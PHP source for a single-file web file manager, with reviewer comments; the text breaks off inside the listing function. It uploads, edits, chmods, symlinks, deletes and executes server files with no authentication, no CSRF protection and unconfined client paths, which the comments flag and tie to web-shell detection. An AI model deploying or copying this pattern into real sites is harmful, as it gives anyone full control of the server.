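<?php
/*
 * Single-file web file manager. A request selects a directory ("dir"), an
 * action ("action", "action_all" or "actionN") and one or more target files;
 * the switch below then performs that action on the server's filesystem with
 * the privileges of the PHP process.
 *
 * Review notes (all grounded in the code below):
 *  - The visible part of the script never authenticates or authorises the
 *    caller and its forms carry no anti-CSRF token, so access control has to
 *    be enforced outside the script (web-server auth, network restriction).
 *  - "dir", "file", "destination" and the upload name are client-supplied and
 *    are only normalised by relative2absolute()/simplify_path(); nothing
 *    confines them to $homedir.
 *  - The action set includes upload, edit, chmod, symlink and execute. A copy
 *    of this file found in a web root therefore deserves investigation; in
 *    access logs it appears as requests to one script carrying fields such as
 *    action, file, dir, olddir, submit_upload and create_name.
 *  - The listing this was recovered from had line numbers fused into every
 *    line and HTML entities decoded inside string literals. Entities
 *    (&amp;, &quot;, &nbsp;, &gt;, &rarr;, &and;, &or;) are restored where the
 *    surrounding markup makes the original unambiguous.
 */

/* ---------------------------------------------------------------- settings */

$lang = 'auto';
$site_charset = 'auto';
$homedir = './';
$editcols = 150;
$editrows = 38;
$htaccess = '.htaccess';
$htpasswd = '.htpasswd';

/* ------------------------------------------------------- request bootstrap */

// get_magic_quotes_gpc() no longer exists in PHP 8; only undo magic quotes
// where the runtime can still apply them.
if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
    array_walk($_GET, 'strip');
    array_walk($_POST, 'strip');
    array_walk($_REQUEST, 'strip');
}

// Icon requests are answered before anything else; getimage() is defined
// further down the file, outside this excerpt.
if (array_key_exists('image', $_GET)) {
    header('Content-Type: image/gif');
    die(getimage($_GET['image']));
}

// Platforms without lstat() fall back to stat(), losing symlink awareness.
if (!function_exists('lstat')) {
    function lstat ($filename)
    {
        return stat($filename);
    }
}

$delim = DIRECTORY_SEPARATOR;
if (function_exists('php_uname')) {
    $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN');
} else {
    $win = ($delim == '\\');
}

if (!empty($_SERVER['PATH_TRANSLATED'])) {
    $scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
    $scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
} elseif (function_exists('getcwd')) {
    $scriptdir = getcwd();
} else {
    $scriptdir = '.';
}
$homedir = relative2absolute($homedir, $scriptdir);

// The working directory comes straight from the request; it is normalised
// below but not restricted to $homedir.
$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
    $dir = relative2absolute($dir, $_POST['olddir']);
}
$directory = simplify_path(addslash($dir));

/* ------------------------------------------ work out the action and files */

$files = array();
$action = '';

// "num" bounds two loops below; cast it once so a non-numeric or missing
// value cannot drive the comparison.
$num = array_key_exists('num', $_POST) ? (int) $_POST['num'] : 0;

if (!empty($_POST['submit_all'])) {
    // Bulk action on every row whose checkbox was ticked.
    $action = $_POST['action_all'];
    for ($i = 0; $i < $num; $i++) {
        if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
            $files[] = $_POST["file$i"];
        }
    }
} elseif (!empty($_REQUEST['action'])) {
    // Direct action on a single file (links and follow-up dialogs).
    $action = $_REQUEST['action'];
    $files[] = relative2absolute($_REQUEST['file'], $directory);
} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
    $files[] = $_FILES['upload'];
    $action = 'upload';
} elseif (array_key_exists('num', $_POST)) {
    // Per-row "Next" button: find which row's submit button was pressed.
    for ($i = 0; $i < $num; $i++) {
        if (array_key_exists("submit$i", $_POST)) break;
    }
    if ($i < $num) {
        $action = $_POST["action$i"];
        $files[] = $_POST["file$i"];
    }
}

if (empty($action)
    && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create'))
    && !empty($_POST['create_name'])) {
    $files[] = relative2absolute($_POST['create_name'], $directory);
    switch ($_POST['create_type']) {
        case 'directory':
            $action = 'create_directory';
            break;
        case 'file':
            $action = 'create_file';
    }
}

if (sizeof($files) == 0) $action = '';
else $file = reset($files);

/* ------------------------------------------------------ locale and defaults */

if ($lang == 'auto') {
    if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
        $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
    } else {
        $lang = 'en';
    }
}
$words = getwords($lang);
if ($site_charset == 'auto') {
    $site_charset = $word_charset; // set as a global by getwords()
}

$cols = ($win) ? 4 : 7;

if (!isset($dirpermission)) {
    $dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
}
if (!isset($filepermission)) {
    $filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
}

if (!empty($_SERVER['SCRIPT_NAME'])) {
    $self = html(basename($_SERVER['SCRIPT_NAME']));
} elseif (!empty($_SERVER['PHP_SELF'])) {
    $self = html(basename($_SERVER['PHP_SELF']));
} else {
    $self = '';
}

if (!empty($_SERVER['SERVER_SOFTWARE'])) {
    $apache = (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache');
} else {
    $apache = true;
}

/* -------------------------------------------------------- action dispatcher */

switch ($action) {

    case 'view':
        if (is_script($file)) {
            ob_start();
            highlight_file($file);
            // ereg_replace() was removed in PHP 7; same pattern via PCRE.
            $src = preg_replace('#<font color="([^"]*)">#', '<span style="color: \1">', ob_get_contents());
            $src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
            ob_end_clean();
            html_header();
            echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
<hr />
<table>
<tr>
<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
<pre style="margin-top: 0"><code>';
            // Read the file once instead of once per loop iteration.
            $linecount = sizeof(file($file));
            for ($i = 1; $i <= $linecount; $i++) echo "$i\n";
            echo '</code></pre>
</td>
<td style="text-align: left; vertical-align: top; padding-left: 3pt">
<pre style="margin-top: 0">' . $src . '</pre>
</td>
</tr>
</table>';
            html_footer();
        } else {
            // NOTE(review): the file is served inline with a type derived
            // from its extension, so an .html file stored through this tool
            // renders as active content in the script's origin.
            header('Content-Type: ' . getmimetype($file));
            header('Content-Disposition: filename=' . basename($file));
            readfile($file);
        }
        break;

    case 'download':
        header('Pragma: public');
        header('Expires: 0');
        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        header('Content-Type: ' . getmimetype($file));
        // The recovered listing had line breaks inside this literal; header()
        // rejects values containing new lines, so it is restored to one line.
        header('Content-Disposition: attachment; filename=' . basename($file) . ';');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        break;

    case 'upload':
        // NOTE(review): the stored name is chosen by the client (original
        // name or "newName") and resolved by relative2absolute(), so it is
        // neither confined to $directory nor checked for type or extension.
        if (isset($_POST['newName']) && $_POST['newName'] != '') $file['name'] = $_POST['newName'];
        $dest = relative2absolute($file['name'], $directory);
        if (@file_exists($dest)) {
            listing_page(error('already_exists', $dest));
        } elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
            @chmod($dest, $filepermission);
            listing_page(notice('uploaded', $file['name']));
        } else {
            listing_page(error('not_uploaded', $file['name']));
        }
        break;

    case 'create_directory':
        if (@file_exists($file)) {
            listing_page(error('already_exists', $file));
        } else {
            $old = @umask(0777 & ~$dirpermission);
            if (@mkdir($file, $dirpermission)) {
                listing_page(notice('created', $file));
            } else {
                listing_page(error('not_created', $file));
            }
            @umask($old);
        }
        break;

    case 'create_file':
        if (@file_exists($file)) {
            listing_page(error('already_exists', $file));
        } else {
            $old = @umask(0777 & ~$filepermission);
            if (@touch($file)) {
                edit($file);
            } else {
                listing_page(error('not_created', $file));
            }
            @umask($old);
        }
        break;

    case 'execute':
        chdir(dirname($file));
        $output = array();
        $retval = 0;
        // The original built 'echo "./NAME" | /bin/sh', which let quotes,
        // `$` and backticks in a file name be parsed as shell syntax. The
        // path is now passed as one quoted word.
        exec(escapeshellarg('./' . basename($file)), $output, $retval);
        $error = ($retval != 0);
        if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
        if ($error) {
            listing_page(error('not_executed', $file, implode("\n", $output)));
        } else {
            listing_page(notice('executed', $file, implode("\n", $output)));
        }
        break;

    case 'delete':
        if (!empty($_POST['no'])) {
            listing_page();
        } elseif (!empty($_POST['yes'])) {
            $failure = array();
            $success = array();
            foreach ($files as $file) {
                if (del($file)) {
                    $success[] = $file;
                } else {
                    $failure[] = $file;
                }
            }
            $message = '';
            if (sizeof($failure) > 0) {
                $message = error('not_deleted', implode("\n", $failure));
            }
            if (sizeof($success) > 0) {
                $message .= notice('deleted', implode("\n", $success));
            }
            listing_page($message);
        } else {
            // Confirmation dialog; request_dump() carries the selection over.
            html_header();
            echo '<form action="' . $self . '" method="post"><table class="dialog"><tr><td class="dialog">';
            request_dump();
            echo "\t<b>" . word('really_delete') . '</b><p>';
            foreach ($files as $file) {
                echo "\t" . html($file) . "<br />\n";
            }
            echo ' </p><hr />
<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" />
<input type="submit" name="no" value="' . word('no') . '" id="red_button" style="margin-left: 50px" />
</td></tr></table></form>';
            html_footer();
        }
        break;

    case 'rename':
        if (!empty($_POST['destination'])) {
            $dest = relative2absolute($_POST['destination'], $directory);
            if (!@file_exists($dest) && @rename($file, $dest)) {
                listing_page(notice('renamed', $file, $dest));
            } else {
                listing_page(error('not_renamed', $file, $dest));
            }
        } else {
            $name = basename($file);
            html_header();
            // The directory prefix was echoed raw in the original; it is
            // request-derived, so it is escaped like the other fields.
            echo '<form action="' . $self . '" method="post"><table class="dialog"><tr>
<td class="dialog">
 <input type="hidden" name="action" value="rename" />
 <input type="hidden" name="file" value="' . html($file) . '" />
 <input type="hidden" name="dir" value="' . html($directory) . '" />
 <b>' . word('rename_file') . '</b>
 <p>' . html($file) . '</p>
 <b>' . html(substr($file, 0, strlen($file) - strlen($name))) . '</b>
 <input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
 <hr />
 <input type="submit" value="' . word('rename') . '" />
</td></tr></table>
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p></form>';
            html_footer();
        }
        break;

    case 'move':
        if (!empty($_POST['destination'])) {
            $dest = relative2absolute($_POST['destination'], $directory);
            $failure = array();
            $success = array();
            foreach ($files as $file) {
                $filename = substr($file, strlen($directory));
                $d = $dest . $filename;
                if (!@file_exists($d) && @rename($file, $d)) {
                    $success[] = $file;
                } else {
                    $failure[] = $file;
                }
            }
            $message = '';
            if (sizeof($failure) > 0) {
                $message = error('not_moved', implode("\n", $failure), $dest);
            }
            if (sizeof($success) > 0) {
                $message .= notice('moved', implode("\n", $success), $dest);
            }
            listing_page($message);
        } else {
            html_header();
            echo '<form action="' . $self . '" method="post"><table class="dialog"><tr><td class="dialog">';
            request_dump();
            echo "\t<b>" . word('move_files') . '</b><p>';
            foreach ($files as $file) {
                echo "\t" . html($file) . "<br />\n";
            }
            echo ' </p><hr /> ' . word('destination') . ':
<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
<input type="submit" value="' . word('move') . '" />
</td></tr></table>
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p></form>';
            html_footer();
        }
        break;

    case 'copy':
        if (!empty($_POST['destination'])) {
            $dest = relative2absolute($_POST['destination'], $directory);
            if (@is_dir($dest)) {
                // Destination is a directory: copy each selected file into it.
                $failure = array();
                $success = array();
                foreach ($files as $file) {
                    $filename = substr($file, strlen($directory));
                    $d = addslash($dest) . $filename;
                    if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
                        $success[] = $file;
                    } else {
                        $failure[] = $file;
                    }
                }
                $message = '';
                if (sizeof($failure) > 0) {
                    $message = error('not_copied', implode("\n", $failure), $dest);
                }
                if (sizeof($success) > 0) {
                    $message .= notice('copied', implode("\n", $success), $dest);
                }
                listing_page($message);
            } else {
                // Destination is a file name: copy the first selected file.
                if (!@file_exists($dest) && @copy($file, $dest)) {
                    listing_page(notice('copied', $file, $dest));
                } else {
                    listing_page(error('not_copied', $file, $dest));
                }
            }
        } else {
            html_header();
            echo '<form action="' . $self . '" method="post"><table class="dialog"><tr><td class="dialog">';
            request_dump();
            echo "\n<b>" . word('copy_files') . '</b><p>';
            foreach ($files as $file) {
                echo "\t" . html($file) . "<br />\n";
            }
            echo ' </p><hr />' . word('destination') . ':
<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
<input type="submit" value="' . word('copy') . '" />
</td></tr></table>
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p></form>';
            html_footer();
        }
        break;

    case 'create_symlink':
        if (!empty($_POST['destination'])) {
            $dest = relative2absolute($_POST['destination'], $directory);
            if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
            if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
            if (!@file_exists($dest) && @symlink($file, $dest)) {
                listing_page(notice('symlinked', $file, $dest));
            } else {
                listing_page(error('not_symlinked', $file, $dest));
            }
        } else {
            html_header();
            echo '<form action="' . $self . '" method="post">
<table class="dialog" id="symlink">
<tr>
 <td style="vertical-align: top">' . word('destination') . ': </td>
 <td>
 <b>' . html($file) . '</b><br />
 <input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
 <label for="checkbox_relative">' . word('relative') . '</label>
 <input type="hidden" name="action" value="create_symlink" />
 <input type="hidden" name="file" value="' . html($file) . '" />
 <input type="hidden" name="dir" value="' . html($directory) . '" />
 </td>
</tr>
<tr>
 <td>' . word('symlink') . ': </td>
 <td>
 <input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
 <input type="submit" value="' . word('create_symlink') . '" />
 </td>
</tr>
</table>
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p></form>';
            html_footer();
        }
        break;

    case 'edit':
        if (!empty($_POST['save'])) {
            // NOTE(review): writes the posted body to whatever path "file"
            // resolved to; there is no restriction on location or extension.
            $content = str_replace("\r\n", "\n", $_POST['content']);
            if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
                listing_page(notice('saved', $file));
            } else {
                listing_page(error('not_saved', $file));
            }
        } else {
            if (@is_readable($file) && @is_writable($file)) {
                edit($file);
            } else {
                listing_page(error('not_edited', $file));
            }
        }
        break;

    case 'permission':
        // Form field name => permission bit, grouped by table row.
        $permrows = array(
            'read'    => array('ur' => 0400, 'gr' => 0040, 'or' => 0004),
            'write'   => array('uw' => 0200, 'gw' => 0020, 'ow' => 0002),
            'execute' => array('ux' => 0100, 'gx' => 0010, 'ox' => 0001),
        );
        if (!empty($_POST['set'])) {
            $mode = 0;
            foreach ($permrows as $boxes) {
                foreach ($boxes as $field => $bit) {
                    if (!empty($_POST[$field])) $mode |= $bit;
                }
            }
            if (@chmod($file, $mode)) {
                listing_page(notice('permission_set', $file, decoct($mode)));
            } else {
                listing_page(error('permission_not_set', $file, decoct($mode)));
            }
        } else {
            html_header();
            $mode = fileperms($file);
            echo '<form action="' . $self . '" method="post">
<table class="dialog">
<tr>
<td class="dialog">
 <p style="margin: 0">' . phrase('permission_for', $file) . '</p>
 <hr />
 <table id="permission">
 <tr>
 <td></td>
 <td style="border-right: 1px solid black">' . word('owner') . '</td>
 <td style="border-right: 1px solid black">' . word('group') . '</td>
 <td>' . word('other') . '</td>
 </tr>';
            foreach ($permrows as $label => $boxes) {
                echo '
 <tr>
 <td style="text-align: right">' . word($label) . ':</td>';
                foreach ($boxes as $field => $bit) {
                    echo '
 <td><input type="checkbox" name="' . $field . '" value="1"';
                    if ($mode & $bit) echo ' checked="checked"';
                    echo ' /></td>';
                }
                echo '
 </tr>';
            }
            echo '
 </table>
 <hr />
 <input type="submit" name="set" value=" ' . word('set') . ' " />
 <input type="hidden" name="action" value="permission" />
 <input type="hidden" name="file" value="' . html($file) . '" />
 <input type="hidden" name="dir" value="' . html($directory) . '" />
</td>
</tr>
</table>
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p></form>';
            html_footer();
        }
        break;

    default:
        listing_page();
}

/* ---------------------------------------------------------------- functions */

/**
 * Read a directory and collect lstat()-based metadata for every entry.
 *
 * @param string $directory directory path; entry names are appended to it
 *                          directly, so it must end with the separator
 * @return array|false list of per-entry arrays, or false if the directory
 *                     cannot be opened
 */
function getlist ($directory)
{
    global $delim, $win;

    $d = @opendir($directory);
    if (!$d) {
        return false;
    }

    $files = array();
    while (($filename = @readdir($d)) !== false) {
        $path = $directory . $filename;
        $stat = @lstat($path);
        if (!$stat) {
            continue;
        }
        $file = array(
            'filename'    => $filename,
            'path'        => $path,
            'is_file'     => @is_file($path),
            'is_dir'      => @is_dir($path),
            'is_link'     => @is_link($path),
            'is_readable' => @is_readable($path),
            'is_writable' => @is_writable($path),
            'size'        => $stat['size'],
            'permission'  => $stat['mode'],
            'owner'       => $stat['uid'],
            'group'       => $stat['gid'],
            'mtime'       => @filemtime($path),
            'atime'       => @fileatime($path),
            'ctime'       => @filectime($path)
        );
        if ($file['is_dir']) {
            // A directory counts as "executable" when it can be entered.
            $file['is_executable'] = @file_exists($path . $delim . '.');
        } elseif (!$win) {
            $file['is_executable'] = @is_executable($path);
        } else {
            $file['is_executable'] = true;
        }
        if ($file['is_link']) $file['target'] = @readlink($path);
        // The original took reset() of the lookup result, which fails when
        // the id has no passwd/group entry; only set the name when found.
        if (function_exists('posix_getpwuid')) {
            $pw = @posix_getpwuid($file['owner']);
            if (is_array($pw)) $file['owner_name'] = reset($pw);
        }
        if (function_exists('posix_getgrgid')) {
            $gr = @posix_getgrgid($file['group']);
            if (is_array($gr)) $file['group_name'] = reset($gr);
        }
        $files[] = $file;
    }
    closedir($d); // the original never released the handle
    return $files;
}

/**
 * Order a listing by one metadata key, directories before files.
 *
 * @param array  $list    entries as produced by getlist()
 * @param string $key     metadata key to compare on
 * @param bool   $reverse reverse each group after sorting
 * @return array
 */
function sortlist ($list, $key, $reverse)
{
    $dirs = array();
    $files = array();
    foreach ($list as $entry) {
        if ($entry['is_dir']) $dirs[] = $entry;
        else $files[] = $entry;
    }
    quicksort($dirs, 0, sizeof($dirs) - 1, $key);
    if ($reverse) $dirs = array_reverse($dirs);
    quicksort($files, 0, sizeof($files) - 1, $key);
    if ($reverse) $files = array_reverse($files);
    return array_merge($dirs, $files);
}

/**
 * In-place recursive quicksort of $array[$first..$last] on $array[i][$key].
 */
function quicksort (&$array, $first, $last, $key)
{
    if ($first < $last) {
        // floor() returns a float; cast so it is a valid array offset.
        $cmp = $array[(int) floor(($first + $last) / 2)][$key];
        $l = $first;
        $r = $last;
        while ($l <= $r) {
            while ($array[$l][$key] < $cmp) $l++;
            while ($array[$r][$key] > $cmp) $r--;
            if ($l <= $r) {
                $tmp = $array[$l];
                $array[$l] = $array[$r];
                $array[$r] = $tmp;
                $l++;
                $r--;
            }
        }
        quicksort($array, $first, $r, $key);
        quicksort($array, $l, $last, $key);
    }
}

/**
 * Render a stat() mode word as an "ls -l" style string such as "-rwxr-xr-x".
 *
 * @param int $mode file mode including the type bits
 * @return string ten characters: type, then owner/group/other triplets
 */
function permission_octal2string ($mode)
{
    if (($mode & 0xC000) === 0xC000) {
        $type = 's';
    } elseif (($mode & 0xA000) === 0xA000) {
        $type = 'l';
    } elseif (($mode & 0x8000) === 0x8000) {
        $type = '-';
    } elseif (($mode & 0x6000) === 0x6000) {
        $type = 'b';
    } elseif (($mode & 0x4000) === 0x4000) {
        $type = 'd';
    } elseif (($mode & 0x2000) === 0x2000) {
        $type = 'c';
    } elseif (($mode & 0x1000) === 0x1000) {
        $type = 'p';
    } else {
        $type = '?';
    }

    $owner = ($mode & 00400) ? 'r' : '-';
    $owner .= ($mode & 00200) ? 'w' : '-';
    if ($mode & 0x800) { // setuid bit
        $owner .= ($mode & 00100) ? 's' : 'S';
    } else {
        $owner .= ($mode & 00100) ? 'x' : '-';
    }

    $group = ($mode & 00040) ? 'r' : '-';
    $group .= ($mode & 00020) ? 'w' : '-';
    if ($mode & 0x400) { // setgid bit
        $group .= ($mode & 00010) ? 's' : 'S';
    } else {
        $group .= ($mode & 00010) ? 'x' : '-';
    }

    $other = ($mode & 00004) ? 'r' : '-';
    $other .= ($mode & 00002) ? 'w' : '-';
    if ($mode & 0x200) { // sticky bit
        $other .= ($mode & 00001) ? 't' : 'T';
    } else {
        $other .= ($mode & 00001) ? 'x' : '-';
    }

    return $type . $owner . $group . $other;
}

/**
 * Tell whether a file name ends in .php, .php3, .php4 or .php5.
 * (ereg() was removed in PHP 7; the same pattern is run through PCRE.)
 */
function is_script ($filename)
{
    return preg_match('/\.php$|\.php3$|\.php4$|\.php5$/', $filename) === 1;
}

/**
 * Guess a MIME type from the file extension, defaulting to text/plain.
 */
function getmimetype ($filename)
{
    // NOTE(review): '\.html$' appears twice in the recovered listing; the
    // second alternative is kept exactly as found.
    static $mimes = array(
        '\.jpg$|\.jpeg$' => 'image/jpeg',
        '\.gif$'         => 'image/gif',
        '\.png$'         => 'image/png',
        '\.html$|\.html$' => 'text/html',
        '\.txt$|\.asc$'  => 'text/plain',
        '\.xml$|\.xsl$'  => 'application/xml',
        '\.pdf$'         => 'application/pdf'
    );
    foreach ($mimes as $regex => $mime) {
        // eregi() was removed in PHP 7; /i keeps the match case-insensitive.
        if (preg_match('/' . $regex . '/i', $filename)) return $mime;
    }
    return 'text/plain';
}

/**
 * Delete a file, or a directory together with everything below it.
 * Symlinks to directories are unlinked, not followed.
 *
 * @return bool true only if the path and all of its children were removed
 */
function del ($file)
{
    global $delim;

    if (!file_exists($file)) return false;

    if (@is_dir($file) && !@is_link($file)) {
        $success = false;
        if (@rmdir($file)) {
            $success = true; // the directory was already empty
        } elseif ($dir = @opendir($file)) {
            $success = true;
            while (($f = readdir($dir)) !== false) {
                if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
                    $success = false;
                }
            }
            closedir($dir);
            if ($success) $success = @rmdir($file);
        }
        return $success;
    }
    return @unlink($file);
}

/**
 * Ensure a directory path ends with the platform separator.
 */
function addslash ($directory)
{
    global $delim;
    if (substr($directory, -1, 1) != $delim) {
        return $directory . $delim;
    }
    return $directory;
}

/**
 * Resolve $string against $directory unless it is already absolute, then
 * normalise it. The result is not checked against any base directory.
 */
function relative2absolute ($string, $directory)
{
    if (path_is_relative($string)) {
        return simplify_path(addslash($directory) . $string);
    }
    return simplify_path($string);
}

/**
 * A path is relative unless it starts with "/" (or has ":" as its second
 * character on Windows).
 */
function path_is_relative ($path)
{
    global $win;
    if ($win) {
        return (substr($path, 1, 1) != ':');
    }
    return (substr($path, 0, 1) != '/');
}

/**
 * Express $target relative to $directory by walking up with "../" until
 * $directory is a prefix of $target.
 */
function absolute2relative ($directory, $target)
{
    global $delim;
    $path = '';
    while ($directory != $target) {
        if ($directory == substr($target, 0, strlen($directory))) {
            $path .= substr($target, strlen($directory));
            break;
        }
        $parent = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
        if ($parent == $directory) {
            // Reached the top without finding a common prefix (for example a
            // relative $target); the original looped forever here.
            break;
        }
        $path .= '..' . $delim;
        $directory = $parent;
    }
    if ($path == '') $path = '.';
    return $path;
}

/**
 * Normalise a path: realpath() when the path exists, otherwise textual
 * removal of "/./" and "segment/../" sequences.
 */
function simplify_path ($path)
{
    global $delim;

    if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
        $path = realpath($path);
        if (@is_dir($path)) {
            return addslash($path);
        }
        return $path;
    }

    $pattern = $delim . '.' . $delim;
    if (@is_dir($path)) {
        $path = addslash($path);
    }
    while (strpos($path, $pattern) !== false) {
        $path = str_replace($pattern, $delim, $path);
    }

    // ereg()/ereg_replace() were removed in PHP 7; same expression via PCRE.
    $e = preg_quote($delim, '#');
    $regex = '#' . $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e . '#';
    while (preg_match($regex, $path)) {
        $path = preg_replace($regex, $delim, $path);
    }
    return $path;
}

/**
 * Format a byte count with a binary unit, e.g. 1536 -> "1,50 KB".
 */
function byteConvert (&$bytes)
{
    $b = (int) $bytes;
    $s = array(' B', 'KB', 'MB', 'GB', 'TB');
    if ($b <= 0) {
        return "0 " . $s[0];
    }
    $con = 1024;
    // Clamp so values beyond the largest unit do not index past the table.
    $e = min((int) (log($b, $con)), sizeof($s) - 1);
    return number_format($b / pow($con, $e), 2, ',', '.') . ' ' . $s[$e];
}

/**
 * array_walk() callback that undoes magic-quotes escaping in place.
 * Array-valued parameters (name[]=...) are walked recursively.
 */
function strip (&$str)
{
    if (is_array($str)) {
        array_walk($str, 'strip');
    } else {
        $str = stripslashes($str);
    }
}

/**
 * Render the main page: directory chooser, upload/create boxes, an optional
 * message and the sorted listing of the current directory.
 *
 * @param string|null $message pre-rendered HTML from error()/notice()
 */
function listing_page ($message = null)
{
    global $self, $directory, $sort, $reverse;

    html_header();
    $list = getlist($directory);

    if (array_key_exists('sort', $_GET)) $sort = $_GET['sort'];
    else $sort = 'filename';
    if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true;
    else $reverse = false;

    echo '<h1 style="margin-bottom: 0"><a href="FileManager.php">File Manager</a></h1>
<form enctype="multipart/form-data" action="' . $self . '" method="post">
<table id="main" >';
    directory_choice();
    if (@is_writable($directory)) {
        upload_box();
        create_box();
    } else {
        spacer();
    }
    if (!empty($message)) {
        spacer();
        echo $message;
    }
    // The original left this opening tag without its closing ">".
    echo '</table><table id="tblContent">';
    if ($list) {
        $list = sortlist($list, $sort, $reverse);
        listing($list);
    } else {
        echo error('not_readable', $directory);
    }
    echo '</table></form>';
    html_footer();
}

/**
 * Emit the table rows of a directory listing, one per entry, each with the
 * actions that apply to it, followed by the bulk-action footer row.
 *
 * @param array $list sorted entries as produced by getlist()/sortlist()
 */
function listing ($list)
{
    global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;

    echo '<tr class="titleContent">
 <td style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></td>';
    column_title('filename', $sort, $reverse);
    column_title('size', $sort, $reverse);
    if (!$win) {
        column_title('permission', $sort, $reverse);
        column_title('owner', $sort, $reverse);
        column_title('group', $sort, $reverse);
    }
    echo ' <td class="functions">' . word('functions') . '</td></tr>';

    $count = sizeof($list);
    for ($i = 0; $i < $count; $i++) {
        $file = $list[$i];

        $timestamps = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
        $timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
        $timestamps .= 'ctime: ' . date($date_format, $file['ctime']);

        echo '<tr class="listing">
 <td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
 <td class="filename" title="' . html($timestamps) . '">';

        if ($file['is_link']) {
            echo '<img src="' . $self . '?image=link" alt="link" /> ';
            echo html($file['filename']) . ' &rarr; ';
            $real_file = relative2absolute($file['target'], $directory);
            if (@is_readable($real_file)) {
                if (@is_dir($real_file)) {
                    echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
                } else {
                    echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
                }
            } else {
                echo html($file['target']);
            }
        } elseif ($file['is_dir']) {
            echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
            if ($win || $file['is_executable']) {
                echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
            } else {
                echo html($file['filename']);
            }
            echo ' ]';
        } else {
            if (substr($file['filename'], 0, 1) == '.') {
                echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
            } else {
                echo '<img src="' . $self . '?image=file" alt="file" /> ';
            }
            if ($file['is_file'] && $file['is_readable']) {
                echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '" target="_blank">' . html($file['filename']) . '</a>';
            } else {
                echo html($file['filename']);
            }
        }

        if ($file['size'] >= 1000) {
            $human = ' title="' . byteConvert($file['size']) . '"';
        } else {
            $human = '';
        }
        echo "</td>\n";
        echo "\t<td class=\"size\"$human>" . byteConvert($file['size']) . "</td>\n";

        if (!$win) {
            echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
            // Only link to the chmod dialog for non-links the PHP user owns.
            $l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
            if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
            echo html(permission_octal2string($file['permission']));
            if ($l) echo '</a>';
            echo "</td>\n";

            // Account and group names come from the system databases; escape
            // them like every other value written into the page.
            if (array_key_exists('owner_name', $file)) {
                echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">" . html($file['owner_name']) . "</td>\n";
            } else {
                echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
            }
            if (array_key_exists('group_name', $file)) {
                echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">" . html($file['group_name']) . "</td>\n";
            } else {
                echo "\t<td class=\"group\">{$file['group']}</td>\n";
            }
        }

        echo ' <td class="functions"><input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />';

        $actions = array();
        if (function_exists('symlink')) {
            $actions[] = 'create_symlink';
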